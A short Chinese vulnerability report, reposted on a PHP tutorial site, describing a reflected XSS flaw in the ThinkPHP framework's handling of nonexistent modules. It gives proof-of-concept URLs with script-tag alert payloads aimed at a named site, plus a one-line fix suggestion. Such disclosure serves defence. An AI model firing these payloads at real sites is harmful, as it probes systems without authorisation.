简要描述:开源php开发框架默认存在xss 漏洞 ,导致所有使用该框架开发的 系统 都存在xss漏洞
详细说明:对不不存在的模块处理错误不当,导致xss漏洞
漏洞证明:
以超级巡警测试
http://i.sucop测试数据/?m='"><script>alert(3);</script><"&a=login
http://i.sucop测试数据/index.php?m='"><script>alert(0214559);</script><"&a=help&
http://i.sucop测试数据/index.php?m='"><script>alert(0214559);</script><"&a=help&
去看看
修复方案:设置好过滤吧~~~
作者Hxai11
查看更多关于ThinkPHP开发框架xss - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12718